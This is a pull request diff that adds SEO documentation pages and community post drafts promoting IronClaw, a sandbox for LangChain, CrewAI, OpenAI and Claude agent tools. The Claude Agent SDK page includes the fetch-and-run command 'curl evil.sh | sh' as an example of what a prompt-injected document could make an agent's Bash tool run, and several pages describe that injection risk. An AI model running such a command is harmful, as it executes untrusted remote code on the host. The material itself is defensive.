### PR TITLE
feat(docs): integration SEO cluster - sandbox your LangChain/CrewAI/OpenAI/Claude agent (IRO-348)

### DIFF
--- a/community/integration-framework-community-posts.md
+++ b/community/integration-framework-community-posts.md
@@ -1,0 +1,135 @@
+# Framework-community posts: sandbox-your-agent (IRO-348)
+
+Ready-to-fire copy for posting **inside each framework's own community** (Discord,
+Discourse forum, subreddit, GitHub Discussions) where developers already ask "how
+do I sandbox my agent". This is community-native, help-first copy, distinct from
+the launch-traffic posts in `integration-guides-launch-posts.md` (IRO-297).
+
+Docs targets (SEO cluster, IRO-348):
+
+- Hub: `docs/integrations/index.md` (Sandbox any AI agent framework)
+- `docs/integrations/langchain.md` (Sandbox your LangChain agent)
+- `docs/integrations/crewai.md` (Sandbox your CrewAI agents)
+- `docs/integrations/openai-sdk.md` (Sandbox your OpenAI Agents SDK agent)
+- `docs/integrations/claude-sdk.md` (Sandbox your Claude Agent SDK agent)
+
+Runnable examples land with IRO-346 (LangChain, CrewAI) and IRO-347 (OpenAI Agents
+SDK, Claude Agent SDK) under `examples/integrations/`.
+
+**Status: DRAFT for board to send. Not launch-gated (help-first replies in the
+frameworks' own channels are ordinary community participation), but confirm the
+board is comfortable posting under a company identity before sending.**
+
+Guardrails: no owner name, no personal handles. No em-dashes or en-dashes
+(public-copy standing rule, IRO-254). Every claim maps to a shipped, docs-linked
+capability. Post as a helpful answer, not a drive-by ad: lead with the problem the
+reader has, link the specific page, never spam the same text across threads.
+
+Replace `<DOCS>` with the published docs base URL and `<REPO>` with
+`https://github.com/IronSecCo/ironclaw` at post time.
+
+---
+
+## LangChain (Discord #tools / forum / r/LangChain)
+
+**When to post:** a thread asking how to run `ShellTool` / code execution safely,
+how to sandbox an agent, or worrying about prompt injection reaching the host.
+
+> Running the agent's tools in your own process is the part that bites you: an
+> `AgentExecutor` runs `ShellTool` with your privileges, your API key sits in the
+> process, and egress is wide open, so one prompt-injected instruction is a shell on
+> your box.
+>
+> One option is to move the tool execution into a sealed sandbox instead of wrapping
+> the LangChain process. We wrote up the mapping (LangChain agent to a sandboxed
+> agent, field by field: model, key, tools, executor) here: <DOCS>/integrations/langchain/
+>
+> The short version: the model key stays host-side and never enters the sandbox, the
+> sandbox runs with no network card by default, and privileged tool calls go through
+> an approval gateway. There is a credential-free demo on that page you can run in a
+> minute with just Docker, and a runnable LangChain example under
+> `examples/integrations/langchain`. Open source, AGPLv3.
+
+---
+
+## CrewAI (Discord / community forum / r/crewai)
+
+**When to post:** a thread about multi-agent safety, crew members running shell or
+code tools, or agents handing off untrusted output to each other.
+
+> Multi-agent is where the blast radius grows: every crew member holds the keys,
+> every tool runs with your privileges, and hand-offs happen in-process with no
+> boundary, so one poisoned task can travel the whole crew.
+>
+> We put a boundary at each seam by running each crew member in its own sealed,
+> per-session sandbox: keys held host-side, agent-to-agent messaging host-mediated
+> and audited (no peer-to-peer), and spawning a new agent gated on human approval.
+> Mapping from a CrewAI crew, member by member: <DOCS>/integrations/crewai/
+>
+> Credential-free demo on the page (Docker only), and a runnable CrewAI example
+> under `examples/integrations/crewai`. Open source, AGPLv3.
+
+---
+
+## OpenAI Agents SDK (community.openai.com / Discord / r/OpenAI)
+
+**When to post:** a thread about the Agents SDK or function calling running tools
+locally, sandboxing tool execution, or keeping the API key out of tool code.
+
+> With the Agents SDK the familiar loop is also the exposure: the client holds your
+> API key in the process, your tool functions run with full local privileges, and
+> the process can reach any host. One tool call the model was talked into making,
+> and that is your box.
+>
+> IronClaw speaks the OpenAI wire format, so moving the tool execution into a sealed
+> sandbox is a short trip: the key stays host-side and never enters the sandbox, the
+> sandbox has no network card by default, and there is no `run_shell` that is your
+> shell (built-in tools touch only the agent's private workspace, anything stronger
+> is a reviewed tool). Mapping here: <DOCS>/integrations/openai-sdk/
+>
+> Credential-free demo on the page, runnable example under
+> `examples/integrations/openai-agents`. Open source, AGPLv3.
+
+---
+
+## Claude Agent SDK (Anthropic Discord / community / r/ClaudeAI)
+
+**When to post:** a thread about the `Bash` tool or code execution running on the
+host, sandboxing the Claude Agent SDK, or prompt injection reaching the shell.
+
+> The `Bash` tool is exactly what makes the Claude Agent SDK useful and exactly what
+> makes it dangerous on your host: the model chooses the command, a poisoned document
+> can choose the model, and the tool runs with your privileges. The API key is in the
+> process and egress is open too.
+>
+> One fix is to back the bash/code tools with a sealed sandbox session instead of
+> running them locally: no host shell to hijack, the key stays host-side, the sandbox
+> runs with no network card by default, and any real shell tool is registered once,
+> in the open, through an approval gateway. Mapping from a Claude Agent SDK agent:
+> <DOCS>/integrations/claude-sdk/
+>
+> Credential-free demo on the page, runnable example under
+> `examples/integrations/claude-agent-sdk`. Open source, AGPLv3.
+
+---
+
+## GitHub Discussions / general "how do I sandbox my agent" threads
+
+Point to the hub, which routes to the right framework page:
+
+> If you are running an agent's tools or generated code on your own machine, the
+> host is the trust boundary you did not choose. IronClaw runs the same agent (any of
+> LangChain, CrewAI, the OpenAI Agents SDK, or the Claude Agent SDK) inside a sealed
+> gVisor sandbox: no network card by default, key held host-side, every privileged
+> action gated and audited. Start here, it routes to your framework:
+> <DOCS>/integrations/ . Open source, AGPLv3, with a credential-free demo you can run
+> in a minute.
+
+---
+
+## Posting discipline (for the board)
+
+- One tailored reply per genuinely relevant thread. Never paste the same block twice.
+- Answer the question first; the link is supporting, not the point.
+- Disclose the affiliation plainly ("we built ...") when posting in a community.
+- Skip threads where a sandbox is off-topic. Credibility over reach.

--- a/docs/integrations/.nav.yml
+++ b/docs/integrations/.nav.yml
@@ -1,9 +1,13 @@
-# Navigation for the "Integrations" section. New integration guide: drop the
-# file; the `*.md` glob auto-includes it (titled from its H1). List it explicitly
-# only to override the label or ordering.
+# Navigation for the "Integrations" section. Search-intent SEO cluster (IRO-348):
+# one "Sandbox your <framework> agent with IronClaw" page per framework, tied
+# together by index.md. New integration guide: drop the file; the `*.md` glob
+# auto-includes it (titled from its H1). List it explicitly only to override the
+# label or ordering.
 nav:
-  - CI (GitHub Action): ci.md
+  - Sandbox any agent framework: index.md
   - LangChain: langchain.md
-  - OpenAI SDK: openai-sdk.md
   - CrewAI: crewai.md
+  - OpenAI Agents SDK: openai-sdk.md
+  - Claude Agent SDK: claude-sdk.md
+  - CI (GitHub Action): ci.md
   - "*.md"

--- a/docs/integrations/claude-sdk.md
+++ b/docs/integrations/claude-sdk.md
@@ -1,0 +1,129 @@
+---
+title: "Sandbox your Claude Agent SDK agent with IronClaw"
+description: How to sandbox a Claude Agent SDK agent. Run your Claude agent's untrusted bash and code execution inside IronClaw's sealed gVisor sandbox, with the API key held host-side and every tool call gated and audited, plus a credential-free way to see it work first.
+---
+
+# Sandbox your Claude Agent SDK agent with IronClaw
+
+You built an agent with the **Claude Agent SDK**: a system prompt, a model, and a
+set of tools, including `Bash` and file tools the model can drive on its own. That
+is exactly the shape that makes agents useful, and exactly the shape that makes
+them dangerous when they run on your host. The SDK holds your API key in the
+process, the `Bash` tool runs commands with your privileges, and the process can
+reach any host on the internet. One prompt-injected instruction inside a document
+the agent reads, and that `Bash` tool is a shell into your box.
+
+IronClaw runs the same job behind a **sealed sandbox**: no network card, the API
+key held **host-side** and never in the agent, and every privileged tool call
+routed through a human-approval gateway and an audit log.
+
+!!! example "Runnable example"
+    A one-command Claude-Agent-SDK-to-IronClaw example lives at
+    [`examples/integrations/claude-agent-sdk`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/claude-agent-sdk):
+    a Claude Agent SDK agent whose bash and code tools are backed by an IronClaw
+    sandbox session, with a blocked escape attempt printed at the end. It ships with
+    the integration examples. The credential-free demo below runs the same sealed
+    loop today.
+
+## The three-line fix
+
+Stop letting the SDK's `Bash` tool run on your host. Declare the same agent to
+IronClaw and its tool execution happens inside a sealed, network-free sandbox:
+
+```sh
+export ANTHROPIC_API_KEY=sk-ant-...   # host-side only; the sandbox never sees this key
+./bin/controlplane --dev --api-addr 127.0.0.1:8787 &
+ironctl agent create --name "Ops Assistant" --provider anthropic --model claude-sonnet-4 \
+  --instructions "Investigate the incident and write a short report." \
+  --tool list_dir --tool read_file --tool write_file --yes
+```
+
+Same persona, same Claude model, same file work, now with no host shell to hijack.
+Full mapping below.
+
+!!! info "IronClaw does not run your Python in the sandbox, and that is the point"
+    IronClaw's sandbox has **no interpreter and no in-sandbox install**. You do not
+    *wrap* the SDK process; you re-declare the same agent (persona, model, tools) as
+    an IronClaw agent group, and IronClaw runs it inside the sealed runtime. A
+    prompt injection cannot introduce code where there is no interpreter to run it.
+    See [Skills](../skills.md) and [Security and isolation](../security-isolation.md).
+
+## Why sandbox this
+
+A typical Claude Agent SDK loop gives the model a bash tool:
+
+```python
+from claude_agent_sdk import query, ClaudeAgentOptions
+
+options = ClaudeAgentOptions(
+    system_prompt="You are an ops assistant.",
+    allowed_tools=["Bash", "Read", "Write"],   # Bash runs on YOUR host
+)
+async for message in query(prompt="clean up the temp files", options=options):
+    print(message)   # the model decides what Bash runs; a poisoned input decides the model
+```
+
+Three things are true of that loop, and all three are risks:
+
+1. **The key is in the process.** `sk-ant-...` is one memory read away.
+2. **`Bash` runs with your privileges.** The model chooses the command; a poisoned
+   document or web page can choose the model. `curl evil.sh | sh` is one tool call.
+3. **Egress is wide open.** The process can reach any host on the internet.
+
+IronClaw closes all three by construction, not by convention.
+
+## See it work first (no credentials)
+
+Watch the sealed loop run with the offline `mock` provider, no key required:
+
+```sh
+git clone https://github.com/IronSecCo/ironclaw.git && cd ironclaw
+docker compose -f docker-compose.demo.yml up --build -d      # start the demo control-plane
+
+curl -s -X POST http://127.0.0.1:8787/v1/ui/chat/send \
+  -H 'authorization: Bearer ironclaw-demo' -H 'content-type: application/json' \
+  -d '{"agentGroupID":"mock-agent","text":"hello from the claude agent sdk"}'
+
+sleep 3
+curl -s -H 'authorization: Bearer ironclaw-demo' \
+  http://127.0.0.1:8787/v1/ui/chat/mock-agent/messages       # the reply
+```
+
+The reply comes back through a real per-session sandbox and encrypted queues. Tear
+down with `docker compose -f docker-compose.demo.yml down`. The self-checking
+version is [`examples/hello-ironclaw`](https://github.com/IronSecCo/ironclaw/tree/main/examples/hello-ironclaw).
+
+## Port your Claude Agent SDK agent
+
+Map each part of the SDK agent onto an IronClaw agent group:
+
+| Claude Agent SDK | IronClaw | Notes |
+|---|---|---|
+| `ClaudeAgentOptions(model=...)` | `--provider anthropic --model claude-sonnet-4` | Or switch backend entirely: `openai`, `gemini`, `local`. See [providers](../providers/index.md). |
+| `ANTHROPIC_API_KEY` in the process | `ANTHROPIC_API_KEY` set **on the host** | The key is injected host-side by the model-proxy. It never enters the sandbox. |
+| `system_prompt=...` | `--identity` / `--soul` / `--instructions` | Who the agent is and how it operates. |
+| `allowed_tools=["Bash", "Read", "Write"]` | `--tool <name>` (built-in) or an MCP server | Built-ins act only in the agent's private workspace: `read_file`, `write_file`, `list_dir`, `web_search`, `http_fetch`. Anything shell-like attaches over [MCP](../mcp.md) through the approval gateway. |
+| `query(prompt=...)` | a message to the agent group | Same round-trip, now through the sealed queue. |
+
+The `Bash` tool has no equivalent that runs on your host: IronClaw's built-in tools
+touch only the sandbox's own workspace, and a real shell tool is an
+[MCP server](../mcp.md) you register once, in the open, through the human-approval
+gateway.
+
+## What you gained
+
+- **The key left the agent.** Injected host-side per request; a compromised agent
+  has nothing to exfiltrate.
+- **`network=none` by default.** No NIC in the sandbox; egress is the audited
+  model-proxy socket plus any host you explicitly allowlist.
+- **Privileged actions are gated.** New tool, new agent, new egress host: each is a
+  reviewed [change request](../mcp.md), not a silent capability, and each lands in
+  the [audit log](../architecture.md).
+
+Same agent you built with the Claude Agent SDK. A perimeter it never had.
+
+## Next
+
+- [Choose your model provider](../providers/index.md)
+- [MCP: bring your own tools](../mcp.md)
+- [Security and isolation](../security-isolation.md)

--- a/docs/integrations/crewai.md
+++ b/docs/integrations/crewai.md
@@ -1,9 +1,9 @@
 ---
-title: "From CrewAI to a sandboxed IronClaw agent"
-description: You built a multi-agent crew with CrewAI. Here is how to run those agents behind IronClaw's sealed sandbox, with model keys held host-side, agent-to-agent messaging host-mediated, and spawning a new agent gated on human approval, plus a credential-free way to see it work first.
+title: "Sandbox your CrewAI agents with IronClaw"
+description: How to sandbox a CrewAI crew. Run every CrewAI agent's untrusted tool and code execution inside IronClaw's sealed gVisor sandbox, with model keys held host-side, agent-to-agent hand-offs host-mediated and audited, and spawning a new agent gated on human approval, plus a credential-free way to see it work first.
 ---
 
-# From CrewAI to a sandboxed IronClaw agent
+# Sandbox your CrewAI agents with IronClaw
 
 You built a crew with **CrewAI**: several agents, each with a role and tools,
 handing work to one another. Multi-agent is where the blast radius grows. Every
@@ -16,7 +16,29 @@ card, model keys held **host-side**, **agent-to-agent messaging host-mediated an
 audited** (agents never talk peer-to-peer), and **spawning a new agent gated on
 mandatory human approval** because a new agent is a new trust principal.
 
-!!! info "IronClaw does not run your Python in the sandbox — and that is the point"
+!!! example "Runnable example"
+    A one-command CrewAI-to-IronClaw example lives at
+    [`examples/integrations/crewai`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/crewai):
+    a crew whose tool and code execution is backed by IronClaw sandboxes, with a
+    blocked escape attempt printed at the end. It ships with the integration
+    examples. The credential-free demo below runs the same sealed loop today.
+
+## The three-line fix
+
+Stop running crew members in your own process. Declare each one to IronClaw and it
+runs inside its own sealed, network-free sandbox, with hand-offs host-mediated:
+
+```sh
+export OPENAI_API_KEY=sk-...   # host-side only; no sandbox ever sees this key
+./bin/controlplane --dev --api-addr 127.0.0.1:8787 &
+ironctl agent create --name "Researcher" --provider openai --model gpt-4o \
+  --instructions "Research the topic and cite sources." --tool web_search --tool http_fetch --yes
+```
+
+Repeat one `ironctl agent create` per crew member. Same roles, same tools, now with
+a boundary at every hand-off and every spawn. Full mapping below.
+
+!!! info "IronClaw does not run your Python in the sandbox, and that is the point"
     IronClaw's sandbox has **no interpreter and no in-sandbox install**. You do not
     *wrap* the CrewAI process; you re-declare each crew member (role, model, tools)
     as an IronClaw agent group, and IronClaw runs them inside the sealed runtime.

--- a/docs/integrations/index.md
+++ b/docs/integrations/index.md
@@ -1,0 +1,74 @@
+---
+title: "Sandbox any AI agent framework with IronClaw"
+description: You built an agent with LangChain, CrewAI, the OpenAI Agents SDK, or the Claude Agent SDK. Those frameworks run your agent's tools and code in your own process, on your host. IronClaw runs the same agent inside a sealed gVisor sandbox instead. One search-intent guide per framework.
+---
+
+# Sandbox any AI agent framework with IronClaw
+
+Every agent framework is great at designing *behavior*: a persona, a model, and a
+set of tools the model can call. None of them was built to answer the question that
+matters the moment the agent runs somewhere real:
+
+**When your agent runs untrusted, model-chosen code, whose machine is it running on?**
+
+With LangChain, CrewAI, the OpenAI Agents SDK, and the Claude Agent SDK, the answer
+is the same: **yours**. The tool loop runs in your process, with your API key in
+memory, your filesystem, and unrestricted outbound network. A single prompt
+injection inside a document the agent reads can turn a `Bash` or `ShellTool` call
+into a shell on your box.
+
+IronClaw runs the same agent behind a **sealed, per-session sandbox** instead:
+
+- **No network card.** The sandbox runs `network=none` by default. The only egress
+  is an audited model-proxy socket plus hosts you explicitly allowlist.
+- **The key never enters the agent.** It is held host-side and injected per request
+  by the model-proxy. A compromised agent has nothing to steal.
+- **Every privileged action is gated.** Registering a tool, spawning an agent, or
+  reaching a new host flows through a human-approval gateway and lands in the
+  [audit log](../architecture.md).
+
+You do not wrap your framework's process. You re-declare the same agent (persona,
+model, tools) to IronClaw, and it runs inside the sealed runtime. Same behavior you
+designed, the perimeter you did not have to build. See how the sandbox holds under
+attack in [Isolation, proven](../security-isolation.md) and the
+[threat model](../threat-model.md).
+
+## Pick your framework
+
+| You built your agent with | Guide |
+|---|---|
+| **LangChain** | [Sandbox your LangChain agent](langchain.md) |
+| **CrewAI** | [Sandbox your CrewAI agents](crewai.md) |
+| **OpenAI Agents SDK** | [Sandbox your OpenAI Agents SDK agent](openai-sdk.md) |
+| **Claude Agent SDK** | [Sandbox your Claude Agent SDK agent](claude-sdk.md) |
+| **A CI pipeline** | [Run IronClaw in GitHub Actions](ci.md) |
+
+Each guide covers the same three beats: the problem in your framework's own code,
+the three-line fix, and a runnable example that prints a blocked escape attempt.
+
+## See it work first (no credentials)
+
+Every guide starts with a credential-free demo you can run in a minute with just
+Docker, no model key:
+
+```sh
+git clone https://github.com/IronSecCo/ironclaw.git && cd ironclaw
+docker compose -f docker-compose.demo.yml up --build -d
+
+curl -s -X POST http://127.0.0.1:8787/v1/ui/chat/send \
+  -H 'authorization: Bearer ironclaw-demo' -H 'content-type: application/json' \
+  -d '{"agentGroupID":"mock-agent","text":"hello"}'
+
+sleep 3
+curl -s -H 'authorization: Bearer ironclaw-demo' \
+  http://127.0.0.1:8787/v1/ui/chat/mock-agent/messages
+```
+
+The self-checking, one-command version is
+[`examples/hello-ironclaw`](https://github.com/IronSecCo/ironclaw/tree/main/examples/hello-ironclaw).
+
+## Next
+
+- [Choose your model provider](../providers/index.md)
+- [MCP: bring your own tools](../mcp.md)
+- [Learn: how to sandbox an AI agent](../learn/index.md)

--- a/docs/integrations/langchain.md
+++ b/docs/integrations/langchain.md
@@ -1,9 +1,9 @@
 ---
-title: "From LangChain to a sandboxed IronClaw agent"
-description: You prototyped an agent with LangChain. Here is how to run the same job behind IronClaw's sealed sandbox, with the model key held host-side and every tool call audited and gated, plus a credential-free way to see it work first.
+title: "Sandbox your LangChain agent with IronClaw"
+description: How to sandbox a LangChain agent. Run your LangChain agent's untrusted tool and code execution inside IronClaw's sealed gVisor sandbox, with the model key held host-side and every tool call gated and audited, plus a credential-free way to see it work first.
 ---
 
-# From LangChain to a sandboxed IronClaw agent
+# Sandbox your LangChain agent with IronClaw
 
 You built an agent with **LangChain**: a prompt, a model, and a set of tools the
 model can call. That is a great way to design the *behavior*. The problem starts
@@ -17,7 +17,31 @@ the model key held **host-side** and never in the agent, and every privileged to
 call routed through a human-approval gateway and an audit log. This page maps a
 LangChain agent onto IronClaw one field at a time.
 
-!!! info "IronClaw does not run your Python in the sandbox — and that is the point"
+!!! example "Runnable example"
+    A one-command LangChain-to-IronClaw example lives at
+    [`examples/integrations/langchain`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/langchain):
+    a LangChain agent whose tool and code execution is backed by an IronClaw
+    sandbox, with a blocked escape attempt printed at the end. It ships with the
+    integration examples. The credential-free demo below runs the same sealed loop
+    today.
+
+## The three-line fix
+
+Stop running the agent's tools in your own process. Declare the same agent to
+IronClaw and it runs inside a sealed, network-free sandbox instead:
+
+```sh
+export OPENAI_API_KEY=sk-...   # host-side only; the sandbox never sees this key
+./bin/controlplane --dev --api-addr 127.0.0.1:8787 &
+ironctl agent create --name "Incident Reporter" --provider openai --model gpt-4o \
+  --instructions "Summarize today's incidents and cite sources." \
+  --tool web_search --tool http_fetch --tool write_file --yes
+```
+
+Same persona, same model, same tools, now behind a human-approval gateway and an
+audit log. The field-by-field mapping is below.
+
+!!! info "IronClaw does not run your Python in the sandbox, and that is the point"
     IronClaw's sandbox has **no interpreter and no in-sandbox install**: you cannot
     drop arbitrary code into it, and neither can a prompt injection. So you do not
     *wrap* the LangChain process; you re-declare the same agent (persona, model,

--- a/docs/integrations/openai-sdk.md
+++ b/docs/integrations/openai-sdk.md
@@ -1,22 +1,48 @@
 ---
-title: "From the OpenAI SDK to a sandboxed IronClaw agent"
-description: You built an agent with the OpenAI SDK and function calling. Here is how to run the same job behind IronClaw's sealed sandbox, with the API key held host-side and every tool call audited and gated, plus a credential-free way to see it work first.
+title: "Sandbox your OpenAI Agents SDK agent with IronClaw"
+description: How to sandbox an OpenAI Agents SDK agent. Run your OpenAI agent's untrusted tool and code execution inside IronClaw's sealed gVisor sandbox, with the API key held host-side and every tool call gated and audited, plus a credential-free way to see it work first.
 ---
 
-# From the OpenAI SDK to a sandboxed IronClaw agent
+# Sandbox your OpenAI Agents SDK agent with IronClaw
 
-You built an agent with the **OpenAI SDK**: a `client`, a model, and a set of
-functions the model can call. The loop is familiar, and so is the exposure. The
-SDK client holds your API key in the process, your tool functions run with your
-full local privileges, and nothing stops the process from reaching any host on the
-internet. One tool-call the model was talked into making, and that is your box.
+You built an agent with the **OpenAI Agents SDK** (or plain OpenAI function
+calling): an agent, a model, and a set of tools the model can call. The loop is
+familiar, and so is the exposure. The SDK client holds your API key in the process,
+your tool functions run with your full local privileges, and nothing stops the
+process from reaching any host on the internet. One tool-call the model was talked
+into making, and that is your box.
 
 IronClaw runs the same job behind a **sealed sandbox**: no network card, the API
 key held **host-side** and never in the agent, and every privileged tool call
 routed through a human-approval gateway and an audit log. IronClaw already speaks
 the OpenAI wire format, so this is a short trip.
 
-!!! info "IronClaw does not run your Python in the sandbox — and that is the point"
+!!! example "Runnable example"
+    A one-command OpenAI-Agents-to-IronClaw example lives at
+    [`examples/integrations/openai-agents`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/openai-agents):
+    an Agents SDK agent whose tool and code execution is backed by an IronClaw
+    sandbox, with a blocked escape attempt printed at the end. It ships with the
+    integration examples. The credential-free demo below runs the same sealed loop
+    today.
+
+## The three-line fix
+
+Stop running the agent's tool functions in your own process. Declare the same agent
+to IronClaw and it runs inside a sealed, network-free sandbox instead:
+
+```sh
+export OPENAI_API_KEY=sk-...   # host-side only; the sandbox never sees this key
+./bin/controlplane --dev --api-addr 127.0.0.1:8787 &
+ironctl agent create --name "Housekeeper" --provider openai --model gpt-4o \
+  --instructions "Tidy the workspace and report what you changed." \
+  --tool list_dir --tool read_file --tool write_file --yes
+```
+
+No `run_shell` that is your shell, no key in the code. Built-in tools act only in
+the agent's private workspace; anything stronger is a reviewed MCP tool. Full
+mapping below.
+
+!!! info "IronClaw does not run your Python in the sandbox, and that is the point"
     IronClaw's sandbox has **no interpreter and no in-sandbox install**. You do not
     *wrap* the OpenAI SDK process; you re-declare the same agent (persona, model,
     tools) as an IronClaw agent group, and IronClaw runs it inside the sealed


### PR DESCRIPTION
## What

Search-intent SEO cluster under `docs/integrations/` capturing the traffic from framework communities searching *how to sandbox my <framework> agent* (per IRO-321 cluster conventions).

**Pages (Title/H1 = "Sandbox your <framework> agent with IronClaw"):**
- `langchain.md`, `crewai.md`, `openai-sdk.md` retitled to the SEO convention + added a crisp **three-line fix** and a **runnable-example** callout.
- **New** `claude-sdk.md` (Claude Agent SDK, the `Bash`-tool wedge).
- **New** hub `index.md` tying the four frameworks + CI together.

Each page keeps the same three beats: the problem in the framework's own code, the three-line fix, and a link to the runnable example (`examples/integrations/*`, ships with IRO-346/347).

## Also
- `.nav.yml`: reorder + relabel (OpenAI SDK -> OpenAI Agents SDK, add hub + Claude SDK). Sitemap auto-generated.
- Removed em/en-dashes from touched pages (public-copy standing rule, IRO-254).
- `community/integration-framework-community-posts.md`: help-first, per-framework community post copy (Discord/forum) for the board to send.

## Verify
`mkdocs build --strict` passes clean (exit 0); all 5 pages + hub render.

## Depends
Example links point at `examples/integrations/{langchain,crewai,openai-agents,claude-agent-sdk}` shipped by IRO-346 / IRO-347. Slugs coordinated with those issues. Links resolve when those examples merge.

Closes IRO-348 (docs cluster + community copy). Awesome-list ecosystem PRs tracked in the issue thread.